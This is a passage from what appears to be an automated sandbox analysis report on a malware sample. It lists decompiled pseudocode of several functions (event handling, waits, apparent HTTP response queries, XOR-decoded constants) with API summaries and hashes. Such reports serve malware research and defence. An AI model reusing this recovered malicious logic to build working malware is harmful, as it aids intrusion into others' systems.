                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                                            										E048770FF(_v16);
                                                                                                                                                                                                                                                            										if(_t64 == 0) {
                                                                                                                                                                                                                                                            											_t64 = E0487A3CD(_v12, _t69);
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										goto L22;
                                                                                                                                                                                                                                                            										L17:
                                                                                                                                                                                                                                                            										_t64 = 0;
                                                                                                                                                                                                                                                            										if(_v8 != 0) {
                                                                                                                                                                                                                                                            											_push(0);
                                                                                                                                                                                                                                                            											_push(_v8);
                                                                                                                                                                                                                                                            											_push(_v16);
                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								L22:
                                                                                                                                                                                                                                                            								_t39 = _v12;
                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t64 = GetLastError();
                                                                                                                                                                                                                                                            						if(_t64 != 0x3e5) {
                                                                                                                                                                                                                                                            							L8:
                                                                                                                                                                                                                                                            							if(_t64 == 0) {
                                                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t64 = E048782BE( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                                                                                                                                                                                                                            							if(_t64 == 0) {
                                                                                                                                                                                                                                                            								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					return _t64;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t54 = E04873D6B(__ecx, __eax);
                                                                                                                                                                                                                                                            					if(_t54 != 0) {
                                                                                                                                                                                                                                                            						return _t54;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                            0x04876d04
                                                                                                                                                                                                                                                            0x04876d05
                                                                                                                                                                                                                                                            0x04876d0b
                                                                                                                                                                                                                                                            0x04876d16
                                                                                                                                                                                                                                                            0x04876d16
                                                                                                                                                                                                                                                            0x04876d18
                                                                                                                                                                                                                                                            0x04877987
                                                                                                                                                                                                                                                            0x0487798c
                                                                                                                                                                                                                                                            0x0487798e
                                                                                                                                                                                                                                                            0x04877993
                                                                                                                                                                                                                                                            0x04877994
                                                                                                                                                                                                                                                            0x04877999
                                                                                                                                                                                                                                                            0x0487799a
                                                                                                                                                                                                                                                            0x048779a5
                                                                                                                                                                                                                                                            0x048779d6
                                                                                                                                                                                                                                                            0x048779db
                                                                                                                                                                                                                                                            0x04877a9e
                                                                                                                                                                                                                                                            0x048779e1
                                                                                                                                                                                                                                                            0x048779e8
                                                                                                                                                                                                                                                            0x048779f0
                                                                                                                                                                                                                                                            0x04877a9b
                                                                                                                                                                                                                                                            0x048779f6
                                                                                                                                                                                                                                                            0x048779fb
                                                                                                                                                                                                                                                            0x04877a02
                                                                                                                                                                                                                                                            0x04877a05
                                                                                                                                                                                                                                                            0x04877a8d
                                                                                                                                                                                                                                                            0x04877a0b
                                                                                                                                                                                                                                                            0x04877a0b
                                                                                                                                                                                                                                                            0x04877a0d
                                                                                                                                                                                                                                                            0x04877a13
                                                                                                                                                                                                                                                            0x04877a14
                                                                                                                                                                                                                                                            0x04877a14
                                                                                                                                                                                                                                                            0x04877a17
                                                                                                                                                                                                                                                            0x04877a1a
                                                                                                                                                                                                                                                            0x04877a20
                                                                                                                                                                                                                                                            0x04877a25
                                                                                                                                                                                                                                                            0x04877a26
                                                                                                                                                                                                                                                            0x04877a2b
                                                                                                                                                                                                                                                            0x04877a2e
                                                                                                                                                                                                                                                            0x04877a39
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877a41
                                                                                                                                                                                                                                                            0x04877a49
                                                                                                                                                                                                                                                            0x04877a55
                                                                                                                                                                                                                                                            0x04877a59
                                                                                                                                                                                                                                                            0x04877a5b
                                                                                                                                                                                                                                                            0x04877a60
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877a60
                                                                                                                                                                                                                                                            0x04877a59
                                                                                                                                                                                                                                                            0x04877a72
                                                                                                                                                                                                                                                            0x04877a75
                                                                                                                                                                                                                                                            0x04877a7c
                                                                                                                                                                                                                                                            0x04877a87
                                                                                                                                                                                                                                                            0x04877a87
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877a62
                                                                                                                                                                                                                                                            0x04877a62
                                                                                                                                                                                                                                                            0x04877a67
                                                                                                                                                                                                                                                            0x04877a69
                                                                                                                                                                                                                                                            0x04877a6a
                                                                                                                                                                                                                                                            0x04877a6d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877a6d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877a67
                                                                                                                                                                                                                                                            0x04877a14
                                                                                                                                                                                                                                                            0x04877a8e
                                                                                                                                                                                                                                                            0x04877a8e
                                                                                                                                                                                                                                                            0x04877a94
                                                                                                                                                                                                                                                            0x04877a94
                                                                                                                                                                                                                                                            0x048779f0
                                                                                                                                                                                                                                                            0x048779a7
                                                                                                                                                                                                                                                            0x048779ad
                                                                                                                                                                                                                                                            0x048779b5
                                                                                                                                                                                                                                                            0x048779ce
                                                                                                                                                                                                                                                            0x048779d0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048779b7
                                                                                                                                                                                                                                                            0x048779c1
                                                                                                                                                                                                                                                            0x048779c5
                                                                                                                                                                                                                                                            0x048779cb
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048779cb
                                                                                                                                                                                                                                                            0x048779c5
                                                                                                                                                                                                                                                            0x048779b5
                                                                                                                                                                                                                                                            0x04877aa7
                                                                                                                                                                                                                                                            0x04876d0d
                                                                                                                                                                                                                                                            0x04876d0d
                                                                                                                                                                                                                                                            0x04876d14
                                                                                                                                                                                                                                                            0x04876d1f
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04876d14

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,73BB81D0), ref: 0487798E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,73BB81D0), ref: 048779A7
                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?), ref: 04877A20
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 04877A3B
                                                                                                                                                                                                                                                              • Part of subcall function 04873D6B: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 04873D82
                                                                                                                                                                                                                                                              • Part of subcall function 04873D6B: SetEvent.KERNEL32(?), ref: 04873D92
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1123145548-0
                                                                                                                                                                                                                                                            • Opcode ID: ee9f13f2fafce4b6146bfbfc9e6970d7e24f01be898ee60826f9a15601c95bd2
                                                                                                                                                                                                                                                            • Instruction ID: 62b73b6aeb1e69c3721eeca40c7bf56f67bada6e8abfd92f823ff4699f538c8e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee9f13f2fafce4b6146bfbfc9e6970d7e24f01be898ee60826f9a15601c95bd2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA41C336600604AFEB21DFA8CC54B6EB7B9EF883A4F154E64E511E7190E770FA81DB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                                            			E048728C2(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                            				signed int _t6;
                                                                                                                                                                                                                                                            				intOrPtr _t8;
                                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                                            				short* _t19;
                                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                            				signed int* _t28;
                                                                                                                                                                                                                                                            				CHAR* _t30;
                                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                                            				intOrPtr* _t32;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t6 =  *0x487d270; // 0xd448b889
                                                                                                                                                                                                                                                            				_t32 = _a4;
                                                                                                                                                                                                                                                            				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                                                                            				_t8 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t3 = _t8 + 0x487e862; // 0x61636f4c
                                                                                                                                                                                                                                                            				_t25 = 0;
                                                                                                                                                                                                                                                            				_t30 = E0487781F(_t3, 1);
                                                                                                                                                                                                                                                            				if(_t30 != 0) {
                                                                                                                                                                                                                                                            					_t25 = CreateEventA(0x487d2a8, 1, 0, _t30);
                                                                                                                                                                                                                                                            					E048770FF(_t30);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t12 =  *0x487d25c; // 0x4000000a
                                                                                                                                                                                                                                                            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E048782EB() != 0) {
                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                            					_t28 = _a8;
                                                                                                                                                                                                                                                            					if(_t28 != 0) {
                                                                                                                                                                                                                                                            						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t31 = E0487731A(_t32, _t26);
                                                                                                                                                                                                                                                            					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                                                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                                                                            						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t19 =  *0x487d0f0( *_t32, 0x20);
                                                                                                                                                                                                                                                            					if(_t19 != 0) {
                                                                                                                                                                                                                                                            						 *_t19 = 0;
                                                                                                                                                                                                                                                            						_t19 = _t19 + 2;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t31 = E04876C7E(0,  *_t32, _t19, 0);
                                                                                                                                                                                                                                                            					if(_t31 == 0) {
                                                                                                                                                                                                                                                            						if(_t25 == 0) {
                                                                                                                                                                                                                                                            							L22:
                                                                                                                                                                                                                                                            							return _t31;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                                            						if(_t31 == 0) {
                                                                                                                                                                                                                                                            							L20:
                                                                                                                                                                                                                                                            							if(_t25 != 0) {
                                                                                                                                                                                                                                                            								CloseHandle(_t25);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L22;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                            0x048728c3
                                                                                                                                                                                                                                                            0x048728ca
                                                                                                                                                                                                                                                            0x048728d4
                                                                                                                                                                                                                                                            0x048728d8
                                                                                                                                                                                                                                                            0x048728de
                                                                                                                                                                                                                                                            0x048728ed
                                                                                                                                                                                                                                                            0x048728f4
                                                                                                                                                                                                                                                            0x048728f8
                                                                                                                                                                                                                                                            0x0487290a
                                                                                                                                                                                                                                                            0x0487290c
                                                                                                                                                                                                                                                            0x0487290c
                                                                                                                                                                                                                                                            0x04872911
                                                                                                                                                                                                                                                            0x04872918
                                                                                                                                                                                                                                                            0x0487296d
                                                                                                                                                                                                                                                            0x0487296d
                                                                                                                                                                                                                                                            0x04872973
                                                                                                                                                                                                                                                            0x04872975
                                                                                                                                                                                                                                                            0x04872975
                                                                                                                                                                                                                                                            0x0487297f
                                                                                                                                                                                                                                                            0x04872983
                                                                                                                                                                                                                                                            0x04872995
                                                                                                                                                                                                                                                            0x04872995
                                                                                                                                                                                                                                                            0x04872999
                                                                                                                                                                                                                                                            0x0487299f
                                                                                                                                                                                                                                                            0x0487299f
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04872931
                                                                                                                                                                                                                                                            0x04872936
                                                                                                                                                                                                                                                            0x0487293e
                                                                                                                                                                                                                                                            0x04872940
                                                                                                                                                                                                                                                            0x04872944
                                                                                                                                                                                                                                                            0x04872944
                                                                                                                                                                                                                                                            0x04872951
                                                                                                                                                                                                                                                            0x04872955
                                                                                                                                                                                                                                                            0x04872959
                                                                                                                                                                                                                                                            0x048729ae
                                                                                                                                                                                                                                                            0x048729b4
                                                                                                                                                                                                                                                            0x048729b4
                                                                                                                                                                                                                                                            0x04872967
                                                                                                                                                                                                                                                            0x0487296b
                                                                                                                                                                                                                                                            0x048729a2
                                                                                                                                                                                                                                                            0x048729a4
                                                                                                                                                                                                                                                            0x048729a7
                                                                                                                                                                                                                                                            0x048729a7
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048729a4
                                                                                                                                                                                                                                                            0x0487296b
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04872955

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0487781F: lstrlen.KERNEL32(048791A4,00000000,00000000,00000027,00000005,00000000,00000000,04877E27,74666F53,00000000,048791A4,0487D00C,?,048791A4), ref: 04877855
                                                                                                                                                                                                                                                              • Part of subcall function 0487781F: lstrcpy.KERNEL32(00000000,00000000), ref: 04877879
                                                                                                                                                                                                                                                              • Part of subcall function 0487781F: lstrcat.KERNEL32(00000000,00000000), ref: 04877881
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(0487D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,0487497B,?,00000001,?), ref: 04872903
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,0487497B,00000000,00000000,?,00000000,?,0487497B,?,00000001,?,?,?,?,048787D8), ref: 04872961
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,0487497B,?,00000001,?), ref: 0487298F
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,0487497B,?,00000001,?,?,?,?,048787D8), ref: 048729A7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 73268831-0
                                                                                                                                                                                                                                                            • Opcode ID: a23c06ae8bcbaec8d2bf952bf640a2f48dd7992359fadaa99b1e7c0d5ff065c1
                                                                                                                                                                                                                                                            • Instruction ID: e31c1a5b3bda26024ae6d6b54a00fa4df4558566260d0c89eeb18b61b8a633ec
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a23c06ae8bcbaec8d2bf952bf640a2f48dd7992359fadaa99b1e7c0d5ff065c1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C121F5329003005BD7226E69AC68F6B73E9EF89720F090F95FA51EB102DA74FC01C6A1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                                                                                                            			E04873D6B(void* __ecx, void* __esi) {
                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                            				long _t34;
                                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                                            				long _t42;
                                                                                                                                                                                                                                                            				long _t56;
                                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t61 = __esi;
                                                                                                                                                                                                                                                            				_t59 = __ecx;
                                                                                                                                                                                                                                                            				_t60 =  *0x487d128; // 0x487ad77
                                                                                                                                                                                                                                                            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                                                                                                                                                                                                                            					_v20 = _t34;
                                                                                                                                                                                                                                                            					if(_t34 != 0) {
                                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                                            						_push( &_v16);
                                                                                                                                                                                                                                                            						_push( &_v8);
                                                                                                                                                                                                                                                            						_push(_t61 + 0x2c);
                                                                                                                                                                                                                                                            						_push(0x20000013);
                                                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                                                            						_v8 = 4;
                                                                                                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                                                                                                            						if( *_t60() == 0) {
                                                                                                                                                                                                                                                            							_t39 = GetLastError();
                                                                                                                                                                                                                                                            							_v12 = _t39;
                                                                                                                                                                                                                                                            							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                                            								return _v12;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_v16 = 0;
                                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                                            							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                                            							_t58 = E048716F8(_v8 + 1);
                                                                                                                                                                                                                                                            							if(_t58 == 0) {
                                                                                                                                                                                                                                                            								_v12 = 8;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_push( &_v16);
                                                                                                                                                                                                                                                            								_push( &_v8);
                                                                                                                                                                                                                                                            								_push(_t58);
                                                                                                                                                                                                                                                            								_push(0x16);
                                                                                                                                                                                                                                                            								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                                                            								if( *_t60() == 0) {
                                                                                                                                                                                                                                                            									E048770FF(_t58);
                                                                                                                                                                                                                                                            									_v12 = GetLastError();
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									 *((char*)(_t58 + _v8)) = 0;
                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					SetEvent( *(_t61 + 0x1c));
                                                                                                                                                                                                                                                            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                                                                                                                                                                                                                            					_v12 = _t56;
                                                                                                                                                                                                                                                            					if(_t56 != 0) {
                                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                                            					_t42 = E048782BE( *(_t61 + 0x1c), _t59, 0xea60);
                                                                                                                                                                                                                                                            					_v12 = _t42;
                                                                                                                                                                                                                                                            				} while (_t42 == 0);
                                                                                                                                                                                                                                                            				goto L15;
                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                            0x04873d6b
                                                                                                                                                                                                                                                            0x04873d6b
                                                                                                                                                                                                                                                            0x04873d75
                                                                                                                                                                                                                                                            0x04873d7b
                                                                                                                                                                                                                                                            0x04873d7e
                                                                                                                                                                                                                                                            0x04873d82
                                                                                                                                                                                                                                                            0x04873d8a
                                                                                                                                                                                                                                                            0x04873d8d
                                                                                                                                                                                                                                                            0x04873da6
                                                                                                                                                                                                                                                            0x04873da9
                                                                                                                                                                                                                                                            0x04873dad
                                                                                                                                                                                                                                                            0x04873db1
                                                                                                                                                                                                                                                            0x04873db2
                                                                                                                                                                                                                                                            0x04873db7
                                                                                                                                                                                                                                                            0x04873dba
                                                                                                                                                                                                                                                            0x04873dc1
                                                                                                                                                                                                                                                            0x04873dc8
                                                                                                                                                                                                                                                            0x04873e1b
                                                                                                                                                                                                                                                            0x04873e24
                                                                                                                                                                                                                                                            0x04873e27
                                                                                                                                                                                                                                                            0x04873e62
                                                                                                                                                                                                                                                            0x04873e68
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04873e27
                                                                                                                                                                                                                                                            0x04873dce
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04873dd5
                                                                                                                                                                                                                                                            0x04873de3
                                                                                                                                                                                                                                                            0x04873de6
                                                                                                                                                                                                                                                            0x04873de9
                                                                                                                                                                                                                                                            0x04873df5
                                                                                                                                                                                                                                                            0x04873df9
                                                                                                                                                                                                                                                            0x04873e5b
                                                                                                                                                                                                                                                            0x04873dfb
                                                                                                                                                                                                                                                            0x04873dfe
                                                                                                                                                                                                                                                            0x04873e02
                                                                                                                                                                                                                                                            0x04873e03
                                                                                                                                                                                                                                                            0x04873e04
                                                                                                                                                                                                                                                            0x04873e06
                                                                                                                                                                                                                                                            0x04873e0d
                                                                                                                                                                                                                                                            0x04873e4b
                                                                                                                                                                                                                                                            0x04873e56
                                                                                                                                                                                                                                                            0x04873e0f
                                                                                                                                                                                                                                                            0x04873e12
                                                                                                                                                                                                                                                            0x04873e16
                                                                                                                                                                                                                                                            0x04873e16
                                                                                                                                                                                                                                                            0x04873e0d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04873df9
                                                                                                                                                                                                                                                            0x04873dce
                                                                                                                                                                                                                                                            0x04873d92
                                                                                                                                                                                                                                                            0x04873d98
                                                                                                                                                                                                                                                            0x04873d9d
                                                                                                                                                                                                                                                            0x04873da0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04873e30
                                                                                                                                                                                                                                                            0x04873e38
                                                                                                                                                                                                                                                            0x04873e3f
                                                                                                                                                                                                                                                            0x04873e3f
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 04873D82
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 04873D92
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 04873E1B
                                                                                                                                                                                                                                                              • Part of subcall function 048782BE: WaitForMultipleObjects.KERNEL32(00000002,0487AA1E,00000000,0487AA1E,?,?,?,0487AA1E,0000EA60), ref: 048782D9
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 04873E50
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 602384898-0
                                                                                                                                                                                                                                                            • Opcode ID: a547e0f09d09d1e2418851885bc839db19457fdadd2cb6ad151fc169fbb7e6d1
                                                                                                                                                                                                                                                            • Instruction ID: cfbb8a0025be06a2fb19176e5ae365ed6d0fbe4d85e46f594a3d034a44ab4d3f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a547e0f09d09d1e2418851885bc839db19457fdadd2cb6ad151fc169fbb7e6d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6312275D0020DEFDB20DF99C89499EBBB8FB09344F108A69E542E2540D774FA44EF62
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 40%
                                                                                                                                                                                                                                                            			E048748CC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                                            				signed int* _t39;
                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t36 = __ecx;
                                                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				_v12 = _a4;
                                                                                                                                                                                                                                                            				_t38 = E04877EFA(__ecx,  &_v32);
                                                                                                                                                                                                                                                            				if(_t38 != 0) {
                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                            					_t39 = _a8;
                                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                                            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                            						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                                                                                                                                            						_t23 = _t16;
                                                                                                                                                                                                                                                            						if( *_t16 != 0) {
                                                                                                                                                                                                                                                            							E0487A6C5(_t23);
